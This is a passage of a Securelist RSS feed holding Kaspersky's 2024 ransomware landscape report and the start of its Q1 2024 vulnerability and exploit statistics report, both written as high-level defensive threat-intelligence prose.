  192. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  193. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  194. </item>
  195. <item>
  196. <title>State of ransomware in 2024</title>
  197. <link>https://securelist.com/state-of-ransomware-2023/112590/</link>
  198. <comments>https://securelist.com/state-of-ransomware-2023/112590/#respond</comments>
  199. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  200. <pubDate>Wed, 08 May 2024 10:00:40 +0000</pubDate>
  201. <category><![CDATA[Publications]]></category>
  202. <category><![CDATA[Cybercrime Legislation]]></category>
  203. <category><![CDATA[Data Encryption]]></category>
  204. <category><![CDATA[LockBit]]></category>
  205. <category><![CDATA[Ransomware]]></category>
  206. <category><![CDATA[Financial threats]]></category>
  207. <category><![CDATA[Windows malware]]></category>
  208. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112590</guid>
  209.  
  210. <description><![CDATA[As Anti-Ransomware Day approaches, Kaspersky shares insights into the ransomware threat landscape and trends in 2023, and recent anti-ransomware activities by governments and law enforcement.]]></description>
  211. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://securelist.com/modern-ransomware-groups-ttps/106824/" target="_blank" rel="noopener">Ransomware</a> attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.</p>
  212. <h2 id="ransomware-landscape-rise-in-targeted-groups-and-attacks">Ransomware landscape: rise in targeted groups and attacks</h2>
  213. <p>Kaspersky collected data on targeted ransomware groups and their attacks for the years 2022 and 2023 from multiple relevant public sources, then filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.</p>
  214. <p>Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.</p>
  215. <div id="attachment_112592" style="width: 967px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112592" class="size-full wp-image-112592" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png" alt="Most active ransomware families by number of victims, 2023" width="957" height="560" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023.png 957w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-300x176.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-768x449.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-598x350.png 598w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-740x433.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-479x280.png 479w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07144706/State_of_ransomware_2023-800x468.png 800w" sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-112592" class="wp-caption-text">Most active ransomware families by number of victims, 2023</p></div>
  216. <p>The ransomware most frequently encountered in organizations&#8217; systems in 2023 was <a href="https://securelist.com/lockbit-3-0-based-custom-targeted-ransomware/112375/" target="_blank" rel="noopener">Lockbit 3.0</a>. The reason for its remarkable activity may be its builder leak in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat/ALPHV</a>, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">disrupted</a> BlackCat&#8217;s operations and seized several websites of the group. However, immediately after the operation, BlackCat <a href="https://therecord.media/alphv-blackcat-ransomware-seized-sites-onion-tor-darkweb-fbi" target="_blank" rel="noopener">stated</a> that it had &#8220;unseized&#8221; at least some of the sites. The US Department of State <a href="https://www.state.gov/u-s-department-of-state-announces-reward-offers-for-criminal-associates-of-the-alphv-blackcat-ransomware-variant/" target="_blank" rel="noopener">offers</a> a 10 million bounty for the group&#8217;s associates. The third most active ransomware in 2023 was <a href="https://thehipaaetool.com/lessons-from-the-moveit-data-breach/" target="_blank" rel="noopener">Cl0p</a>. This group managed to breach the managed file transfer system MOVEit to get to its customers&#8217; data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2500 organizations.</p>
  217. <h3 id="other-notable-ransomware-variants">Other notable ransomware variants</h3>
  218. <p>In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not among the most active in 2023, are interesting in one way or another.</p>
  219. <ul>
  220. <li><strong>BlackHunt:</strong> Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for &#8220;Vaccine.txt&#8221; before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn&#8217;t proceed with encryption.</li>
  221. <li><strong>Rhysida:</strong> Emerging in May 2023, Rhysida is a new RaaS operation initially targeting <a href="https://securelist.com/crimeware-report-gopix-lumar-rhysida/110871/#rhysida" target="_blank" rel="noopener">Windows</a> but later <a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-rhysida" target="_blank" rel="noopener">expanding to Linux</a>. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.</li>
  222. <li><strong>Akira:</strong> A compact C++ ransomware compatible with both Windows and Linux, <a href="https://securelist.com/crimeware-report-fakesg-akira-amos/111483/#akira" target="_blank" rel="noopener">Akira</a> has impacted over 60 organizations across various sectors. It employs a single key for encryption, and featured an encryption flaw in early versions, which made file decryption possible without the ransomware operators&#8217; knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic JQuery Terminal-based hidden service.</li>
  223. <li><strong>Mallox:</strong> Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.</li>
  224. <li><strong>3AM:</strong> A new RaaS variant, 3AM features a sophisticated command-line interface, and an &#8220;access key&#8221; feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.</li>
  225. </ul>
  226. <h2 id="trends-observed-in-our-incident-response-practice">Trends observed in our incident response practice</h2>
  227. <p>This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don&#8217;t cover all ransomware-related incidents that occurred last year.</p>
  228. <p>According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of the economy or industry they belonged to.</p>
  229. <p>Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. Speaking of ransomware specifically, trusted relationship attacks were one of the four main initial infection vectors. The other three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.</p>
  230. <p>Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.</p>
  231. <h3 id="ransomware-groups-tactics-and-techniques">Ransomware groups&#8217; tactics and techniques</h3>
  232. <p>Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as those built on vulnerable versions of Log4j. By exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.</p>
  233. <p>Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.</p>
  234. <p>In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization&#8217;s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they have also adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.</p>
  235. <p>Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.</p>
  236. <p>Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.</p>
  237. <h2 id="ransomware-becoming-a-matter-of-national-and-international-security">Ransomware: becoming a matter of national and international security</h2>
  238. <p>Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the <a href="https://estatements.unmeetings.org/estatements/12.1255/20231211100000000/Esyr02c2qUjw/lszA98NeSJ5l_en.pdf" target="_blank" rel="noopener">UN Open-ended Working Group (OEWG) on cybersecurity</a>. The frequency and disruptive character of ransomware attacks has become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.</p>
  239. <p>One notable initiative is the formation in 2021 of <a href="https://counter-ransomware.org/" target="_blank" rel="noopener">the international Counter Ransomware Initiative (CRI)</a>, which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers&#8217; operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.</p>
  240. <p>Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/information-sharing/cyber-incident-reporting-critical-infrastructure-act-2022-circia" target="_blank" rel="noopener">the Cyber Incident Reporting for Critical Infrastructure Act of 2022</a> aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a <a href="https://www.legifrance.gouv.fr/jorf/article_jo/JORFARTI000047046789" target="_blank" rel="noopener">law</a> that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.</p>
  241. <p>State agencies&#8217; reporting on ransomware indicates that fighting this threat is a priority for authorities. In its latest <a href="https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html" target="_blank" rel="noopener">IT Security Report 2023, the BSI (Germany)</a> identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from &#8220;big game hunting&#8221; to targeting smaller companies and municipal administrations.</p>
  242. <p>Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized the infrastructure of ransomware groups such as <a href="https://www.justice.gov/opa/pr/us-department-justice-disrupts-hive-ransomware-variant" target="_blank" rel="noopener">Hive</a>, <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noopener">BlackCat</a>, and <a href="https://www.europol.europa.eu/media-press/newsroom/news/ragnar-locker-ransomware-gang-taken-down-international-police-swoop" target="_blank" rel="noopener">Ragnar</a>. Early 2024 saw Operation Cronos <a href="https://www.europol.europa.eu/media-press/newsroom/news/law-enforcement-disrupt-worlds-biggest-ransomware-operation" target="_blank" rel="noopener">disrupt</a> Lockbit and get access to their decryption keys, and in May 2024, the group&#8217;s leader <a href="https://nationalcrimeagency.gov.uk/news/lockbit-leader-unmasked-and-sanctioned" target="_blank" rel="noopener">was unmasked and sanctioned</a>. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make maintaining a ransomware operation much more expensive and reduce its income by decrypting victims&#8217; data for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.</p>
  243. <h2 id="ransomware-what-to-expect-in-2024">Ransomware – what to expect in 2024</h2>
  244. <p>As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from disbanded or defunct larger groups.</p>
  245. <p>As officials discuss counter-ransomware measures and law enforcement authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller factions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest to law enforcement, and is therefore less likely to be tracked and prosecuted, which gives independent ransomware actors a higher chance of escaping arrest.</p>
  246. <p>In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.</p>
  247. <p>To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.</p>
  248. <ul>
  249. <li>Use robust, properly-configured security solutions like <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a>.</li>
  250. <li>Implement <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response" target="_blank" rel="noopener">Managed Detection and Response (MDR)</a> to proactively seek out threats.</li>
  251. <li>Disable unused services and ports to minimize the attack surface.</li>
  252. <li>Keep all systems and software up to date with regular updates and patches.</li>
  253. <li>Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.</li>
  254. <li>Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.</li>
  255. <li>Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.</li>
  256. <li>Use <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.</li>
  257. <li>Pay special attention to any &#8220;new&#8221; software being run and installed on systems within your network (including legitimate software).</li>
  258. </ul>
  259. ]]></content:encoded>
  260. <wfw:commentRss>https://securelist.com/state-of-ransomware-2023/112590/feed/</wfw:commentRss>
  261. <slash:comments>0</slash:comments>
  262. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-scaled.jpg" width="2672" height="1496"><media:keywords>full</media:keywords></media:content>
  263. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-1024x573.jpg" width="1024" height="573"><media:keywords>large</media:keywords></media:content>
  264. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-300x168.jpg" width="300" height="168"><media:keywords>medium</media:keywords></media:content>
  265. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/08074057/sl-encryptio-key-danger-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  266. </item>
  267. <item>
  268. <title>Exploits and vulnerabilities in Q1 2024</title>
  269. <link>https://securelist.com/vulnerability-report-q1-2024/112554/</link>
  270. <comments>https://securelist.com/vulnerability-report-q1-2024/112554/#respond</comments>
  271. <dc:creator><![CDATA[Alexander Kolesnikov, Vitaly Morgunov]]></dc:creator>
  272. <pubDate>Tue, 07 May 2024 10:00:39 +0000</pubDate>
  273. <category><![CDATA[Publications]]></category>
  274. <category><![CDATA[Backdoor]]></category>
  275. <category><![CDATA[Browser]]></category>
  276. <category><![CDATA[Linux]]></category>
  277. <category><![CDATA[Microsoft Exchange]]></category>
  278. <category><![CDATA[Microsoft Office]]></category>
  279. <category><![CDATA[Microsoft Windows]]></category>
  280. <category><![CDATA[Targeted attacks]]></category>
  281. <category><![CDATA[Vulnerabilities]]></category>
  282. <category><![CDATA[Vulnerabilities and exploits]]></category>
  283. <category><![CDATA[Vulnerability Statistics]]></category>
  284. <category><![CDATA[Vulnerabilities and exploits]]></category>
  285. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112554</guid>
  286.  
  287. <description><![CDATA[The report provides vulnerability and exploit statistics, key trends, and analysis of interesting vulnerabilities discovered in Q1 2024.]]></description>
  288. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.</p>
  289. <h2 id="statistics-on-registered-vulnerabilities">Statistics on registered vulnerabilities</h2>
  290. <p>To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on <a href="https://cve.mitre.org" target="_blank" rel="noopener">https://cve.mitre.org</a> (at the time of writing, the site is in the process of migrating to a new domain, <a href="https://www.cve.org/" target="_blank" rel="noopener">https://www.cve.org/</a>). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.</p>
  291. <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="interactive" data-title="01 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  292. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091108/01-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  293. <p>As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.</p>
  294. <p>Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions has provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.</p>
  295. <p>Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that make vulnerability monitoring in software more effective. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.</p>
  296. <p>Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.</p>
  297. <p>It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.</p>
  298. <div class="js-infogram-embed" data-id="_/q1XSTSE9SXKud94bFufN" data-type="interactive" data-title="02 EN Vulnerability report graphs" style="min-height:;"></div>
  299. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091119/02-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  300. <p>As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.</p>
  301. <h2 id="exploitation-statistics">Exploitation statistics</h2>
  302. <p>This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.</p>
  303. <p>An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user&#8217;s system are of the highest value to exploit developers.</p>
  304. <p>Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.</p>
  305. <div id="attachment_112556" style="width: 947px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112556" class="size-full wp-image-112556" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png" alt="A dark web buy ad for zero- and one-day exploits" width="937" height="326" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-300x104.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-768x267.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-740x257.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-805x280.png 805w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155211/Vulnerability_report_2023__Q1_2024_01-800x278.png 800w" sizes="(max-width: 937px) 100vw, 937px" /></a><p id="caption-attachment-112556" class="wp-caption-text">A dark web buy ad for zero- and one-day exploits</p></div>
  306. <h3 id="windows-and-linux-vulnerability-exploitation">Windows and Linux vulnerability exploitation</h3>
  307. <p>The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.</p>
  308. <div class="js-infogram-embed" data-id="_/zVTq4mF5zUc1VcatXACX" data-type="interactive" data-title="04 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  309. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095107/04-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  310. <div class="js-infogram-embed" data-id="_/mqB1DB4dRydD21CtOwRd" data-type="interactive" data-title="03 EN-RU-ES Vulnerability report graphs" style="min-height:;"></div>
  311. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07095054/03-en-ru-es-vulnerability-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  312. <p>As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It&#8217;s important to note that this doesn&#8217;t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.</p>
  313. <p>Let&#8217;s illustrate the changes in the popularity of certain vulnerabilities using the example of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR.</p>
  314. <div class="js-infogram-embed" data-id="_/HLfi9KXTIUf4HlJj4Omw" data-type="interactive" data-title="05 EN Vulnerability report graphs" style="min-height:;"></div>
  315. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The popularity dynamics of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR, September 2023 — March 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091129/05-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  316. <p>The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.</p>
  317. <h3 id="public-exploit-statistics">Public exploit statistics</h3>
  318. <p>The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.</p>
  319. <div class="js-infogram-embed" data-id="_/da7IeILEkOtbflqBLPR6" data-type="interactive" data-title="06 EN Vulnerability report graphs" style="min-height:;"></div>
  320. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091139/06-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  321. <p>The statistics reveal an increase in the total number of exploits, encompassing both ready-to-use exploits and raw PoCs. The latter may be unstable, but they demonstrate the possibility of exploiting the vulnerability and hold potential for future refinement. It&#8217;s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.</p>
  322. <div id="attachment_112557" style="width: 972px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112557" class="size-full wp-image-112557" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" alt="A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR" width="962" height="535" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png 962w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-300x167.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-768x427.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-270x150.png 270w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-629x350.png 629w, 